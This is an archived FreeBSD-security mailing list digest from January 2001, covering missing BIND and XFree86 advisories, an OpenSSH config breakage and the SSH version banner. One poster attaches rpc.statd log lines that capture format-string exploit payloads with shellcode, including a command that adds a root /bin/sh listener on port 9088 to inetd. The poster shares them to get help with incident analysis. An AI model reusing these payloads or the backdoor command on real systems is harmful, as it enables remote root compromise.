Security Advisory: FreeBSD-SA-01:10.bind However, they did *NOT* - up to now - appear on the freebsd mailing lists. Did anybody else observe this?? ciao Jan -- Physikalisches Institut der Universitaet Bonn Nussallee 12 D-53115 Bonn GERMANY To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 4:11:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw2.dnepr.net (CoreGW2-TBone.dnepr.net [195.24.156.97]) by hub.freebsd.org (Postfix) with ESMTP id ACF7437B400 for ; Thu, 25 Jan 2001 04:10:51 -0800 (PST) Received: from dnepr.net (dnepr.net [195.24.156.98]) by gw2.dnepr.net (8.8.8/8.6.18/01) with ESMTP id OAA29455; Thu, 25 Jan 2001 14:10:26 +0200 (EET) Received: (from land@localhost) by dnepr.net (8.8.8/8.8.8) id OAA17358; Thu, 25 Jan 2001 14:10:20 +0200 (EET) Date: Thu, 25 Jan 2001 14:10:20 +0200 From: Andrey Lakhno To: Jan Conrad Cc: security@freebsd.org Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: <20010125141020.A16114@dnepr.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from conrad@th.physik.uni-bonn.de on Thu, Jan 25, 2001 at 12:06:57 +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Jan! On Thu, 25 Jan 2001, Jan Conrad wrote: > Hi there, > > I am subscribed to freebsd-security, freebsd-announce and Bugtrag > > On Bugtrag two security announcements appeared: > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > Did anybody else observe this?? I did. -- Best regards, Andrey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 6:20: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C2E2B37B401 for ; Thu, 25 Jan 2001 06:19:38 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA08303; Thu, 25 Jan 2001 06:18:12 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda08301; Thu Jan 25 06:18:00 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f0PEHtY07632; Thu, 25 Jan 2001 06:17:55 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdpu7630; Thu Jan 25 06:17:21 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.2/8.9.1) id f0PEHKk14619; Thu, 25 Jan 2001 06:17:20 -0800 (PST) Message-Id: <200101251417.f0PEHKk14619@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdg14607; Thu Jan 25 06:17:10 2001 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Andrey Lakhno Cc: Jan Conrad , security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? In-reply-to: Your message of "Thu, 25 Jan 2001 14:10:20 +0200." <20010125141020.A16114@dnepr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 25 Jan 2001 06:17:10 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010125141020.A16114@dnepr.net>, Andrey Lakhno writes: > Hi Jan! > > On Thu, 25 Jan 2001, Jan Conrad wrote: > > > Hi there, > > > > I am subscribed to freebsd-security, freebsd-announce and Bugtrag > > > > On Bugtrag two security announcements appeared: > > > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > > > > Did anybody else observe this?? > > I did. I saw them on BUGTRAQ but not on -security or -announce Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 6:34:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from dirac.th.physik.uni-bonn.de (dirac.th.physik.uni-bonn.de [131.220.161.119]) by hub.freebsd.org (Postfix) with SMTP id 5748C37B402 for ; Thu, 25 Jan 2001 06:34:39 -0800 (PST) Received: (qmail 70955 invoked from network); 25 Jan 2001 14:34:37 -0000 Received: from merlin.th.physik.uni-bonn.de (131.220.161.121) by dirac.th.physik.uni-bonn.de with SMTP; 25 Jan 2001 14:34:37 -0000 Received: (qmail 98891 invoked by uid 145); 25 Jan 2001 14:34:37 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jan 2001 14:34:37 -0000 Date: Thu, 25 Jan 2001 15:34:37 +0100 (CET) From: Jan Conrad To: Cy Schubert - ITSD Open Systems Group Cc: Andrey Lakhno , security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? In-Reply-To: <200101251417.f0PEHKk14619@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ok - it seems those advisories were not sent to the lists... I sent a message to Kris Kennaway... ciao Jan On Thu, 25 Jan 2001, Cy Schubert - ITSD Open Systems Group wrote: > In message <20010125141020.A16114@dnepr.net>, Andrey Lakhno writes: > > Hi Jan! > > > > On Thu, 25 Jan 2001, Jan Conrad wrote: > > > > > Hi there, > > > > > > I am subscribed to freebsd-security, freebsd-announce and Bugtrag > > > > > > On Bugtrag two security announcements appeared: > > > > > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > > > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > > > > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > > > > > > > Did anybody else observe this?? > > > > I did. > > I saw them on BUGTRAQ but not on -security or -announce > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > -- Physikalisches Institut der Universitaet Bonn Nussallee 12 D-53115 Bonn GERMANY To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 8:33:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 220CD37B6A7; Thu, 25 Jan 2001 08:32:56 -0800 (PST) Received: from ade by hub.lovett.com with local (Exim 3.20 #1) id 14LpKR-000NcE-00; Thu, 25 Jan 2001 10:32:55 -0600 Date: Thu, 25 Jan 2001 10:32:55 -0600 From: Ade Lovett To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010125103255.A78404@FreeBSD.org> References: <20010124230626.A49802@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010124230626.A49802@citusc17.usc.edu>; from kris@FreeBSD.ORG on Wed, Jan 24, 2001 at 11:06:26PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 24, 2001 at 11:06:26PM -0800, Kris Kennaway wrote: > On Wed, Jan 24, 2001 at 07:09:32PM -0800, Scott Raymond wrote: > > Oh, crap. That's EXACTLY what was happening. > > > > Looks like it's time for another compile. Duh. > > No, it's a configuration directive. Of course, chucking this out: fatal: ConnectionsPerPeriod has been deprecated and then aborting violates POLA. If it's been deprecated, just ignore it for a while, but don't stop functioning because of a "dead" directive. Got bit this morning by that (our ssh/sshd config's are somewhat different from 'normal', and a later experiment with merge didn't remove the offending line, either. Thank heavens for serial consoles. The approach here was not thought through at all, especially with: uxb 22# grep -i connectionsperperiod /usr/src/UPDATING uxb 23# on a fully up-to-date RELENG_4 src/ tree. I would ask, that in -STABLE at least, the fatal error be backed out to a warning, at least for a few months (with sshd ignoring the directive, and continuing to run), and then only move to a fatal error + die. -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 8:54:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cx175057-a.ocnsd1.sdca.home.com (cx175057-a.ocnsd1.sdca.home.com [24.13.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 4D28F37B401 for ; Thu, 25 Jan 2001 08:54:11 -0800 (PST) Received: from localhost (bri@localhost) by cx175057-a.ocnsd1.sdca.home.com (8.11.1/8.11.1) with ESMTP id f0PGsU420150 for ; Thu, 25 Jan 2001 08:54:31 -0800 (PST) (envelope-from bri@sonicboom.org) Date: Thu, 25 Jan 2001 08:54:30 -0800 (PST) From: Brian X-Sender: bri@cx175057-a.ocnsd1.sdca.home.com To: freebsd-security@freebsd.org Subject: openssh banner In-Reply-To: <20010125103255.A78404@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am curious how to get rid of the banner ssh presents if you telnet to port 22, currently ssh release info is given, this is bad.. Bri To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 8:57:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 1BC8537B400 for ; Thu, 25 Jan 2001 08:57:02 -0800 (PST) Received: (from jared@localhost) by puck.nether.net (8.11.1/8.9.3) id f0PGuqm16514; Thu, 25 Jan 2001 11:56:52 -0500 (envelope-from jared) Date: Thu, 25 Jan 2001 11:56:52 -0500 From: Jared Mauch To: Brian Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner Message-ID: <20010125115652.F346@puck.nether.net> References: <20010125103255.A78404@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from bri@sonicboom.org on Thu, Jan 25, 2001 at 08:54:30AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is part of the protocol specification: Read the secsh specification: http://www.ietf.org/internet-drafts/draft-ietf-secsh-connect-08.txt http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-08.txt http://www.ietf.org/internet-drafts/draft-ietf-secsh-userauth-08.txt On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: > > I am curious how to get rid of the banner ssh presents if you telnet to > port 22, currently ssh release info is given, this is bad.. > > Bri > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. END OF LINE | Manager of IP networks built within my own home To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9: 2:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from cx175057-a.ocnsd1.sdca.home.com (cx175057-a.ocnsd1.sdca.home.com [24.13.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 1A8A637B401 for ; Thu, 25 Jan 2001 09:02:07 -0800 (PST) Received: from localhost (bri@localhost) by cx175057-a.ocnsd1.sdca.home.com (8.11.1/8.11.1) with ESMTP id f0PH2OO20184; Thu, 25 Jan 2001 09:02:24 -0800 (PST) (envelope-from bri@sonicboom.org) Date: Thu, 25 Jan 2001 09:02:24 -0800 (PST) From: Brian X-Sender: bri@cx175057-a.ocnsd1.sdca.home.com To: Jared Mauch Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner In-Reply-To: <20010125115652.F346@puck.nether.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Those links, at least the first two are not valid, there have been updates. http://www.ietf.org/ids.by.wg/secsh.html Brian On Thu, 25 Jan 2001, Jared Mauch wrote: > This is part of the protocol specification: > > > Read the secsh specification: > > http://www.ietf.org/internet-drafts/draft-ietf-secsh-connect-08.txt > http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-08.txt > http://www.ietf.org/internet-drafts/draft-ietf-secsh-userauth-08.txt > > > On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: > > > > I am curious how to get rid of the banner ssh presents if you telnet to > > port 22, currently ssh release info is given, this is bad.. > > > > Bri > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Jared Mauch | pgp key available via finger from jared@puck.nether.net > clue++; | http://puck.nether.net/~jared/ My statements are only mine. > END OF LINE | Manager of IP networks built within my own home > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9: 4:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3A38537B402 for ; Thu, 25 Jan 2001 09:03:53 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0PH7KV58681; Thu, 25 Jan 2001 09:07:20 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 09:07:20 -0800 From: Kris Kennaway To: Brian Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner Message-ID: <20010125090720.B58537@citusc17.usc.edu> References: <20010125103255.A78404@FreeBSD.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="61jdw2sOBCFtR2d/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from bri@sonicboom.org on Thu, Jan 25, 2001 at 08:54:30AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --61jdw2sOBCFtR2d/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: >=20 > I am curious how to get rid of the banner ssh presents if you telnet to > port 22, currently ssh release info is given, this is bad.. It needs to do this so that the peer knows which version of the protocol to speak to it. This isn't really a problem, IMO. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --61jdw2sOBCFtR2d/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cF1HWry0BWjoQKURAorXAKC5n4nxhpznDcXr39kDEJFqTLIF7gCg+Vpq +NeWDnprxOir1HcxItKua0w= =q2m2 -----END PGP SIGNATURE----- --61jdw2sOBCFtR2d/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9: 8:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 2A06437B400 for ; Thu, 25 Jan 2001 09:08:24 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0PHBpo58771; Thu, 25 Jan 2001 09:11:51 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 09:11:51 -0800 From: Kris Kennaway To: Jan Conrad Cc: freebsd-security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: <20010125091151.C58537@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="S1BNGpv0yoYahz37" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from conrad@th.physik.uni-bonn.de on Thu, Jan 25, 2001 at 12:06:57PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --S1BNGpv0yoYahz37 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 12:06:57PM +0100, Jan Conrad wrote: > Hi there, >=20 > I am subscribed to freebsd-security, freebsd-announce and Bugtrag >=20 > On Bugtrag two security announcements appeared: >=20 > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind=20 >=20 > However, they did *NOT* - up to now - appear on the freebsd mailing lists. >=20 >=20 > Did anybody else observe this?? There is something wrong with majordomo which is causing it to drop these advisories (I even re-sent them, they still didnt get through). I'll upload them to the FTP site later and post a pointer. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --S1BNGpv0yoYahz37 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cF5XWry0BWjoQKURArUUAJ46PIY7R5zrxSHP2UhV8LzDgkaVIgCcDxne 75sRIfY71YYLejPSrLM6R9U= =GDR7 -----END PGP SIGNATURE----- --S1BNGpv0yoYahz37-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:29:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from troutmask.apl.washington.edu (troutmask.apl.washington.edu [128.208.78.105]) by hub.freebsd.org (Postfix) with ESMTP id 5E61F37B401 for ; Thu, 25 Jan 2001 09:29:01 -0800 (PST) Received: (from kargl@localhost) by troutmask.apl.washington.edu (8.11.1/8.11.1) id f0PHQei65827 for freebsd-security@freebsd.org; Thu, 25 Jan 2001 09:26:40 -0800 (PST) (envelope-from kargl) From: "Steven G. Kargl" Message-Id: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Subject: buffer overflows in rpc.statd? To: freebsd-security@freebsd.org Date: Thu, 25 Jan 2001 09:26:39 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=ELM980443599-65671-0_ Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ELM980443599-65671-0_ Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Are there any known compromises of rpc.statd that involve buffer overflows? I have several entries in /var/log/messages that look suspicious, but I currently don't know what these entries mean (see attachment). The suspicious entries appear to be buffers that someone or something has tried to overflow. -- Steve http://troutmask.apl.washington.edu/~kargl/ --ELM980443599-65671-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=messages Content-Description: /tmp/messages Content-Transfer-Encoding: quoted-printable Jan 8 03:35:28 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 8 03:35:28 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 8 14:40:33 troutmask rpc.statd: Invalid hostname to sm_mon: ^D=F7=FF= =BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=FF=BF^G=F7= =FF=BF%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x= %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^P=EBK^M- v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C= =C3 M-^C=EB#M- ^=B41=C0M-^C=EE M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- = =F3M-^MN=ACM-^MV=B8=CDM-^@1=DBM- =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo = "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m; Jan 9 14:21:57 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 9 14:21:57 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 14 20:28:16 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 14 20:28:16 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 16 19:04:16 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= 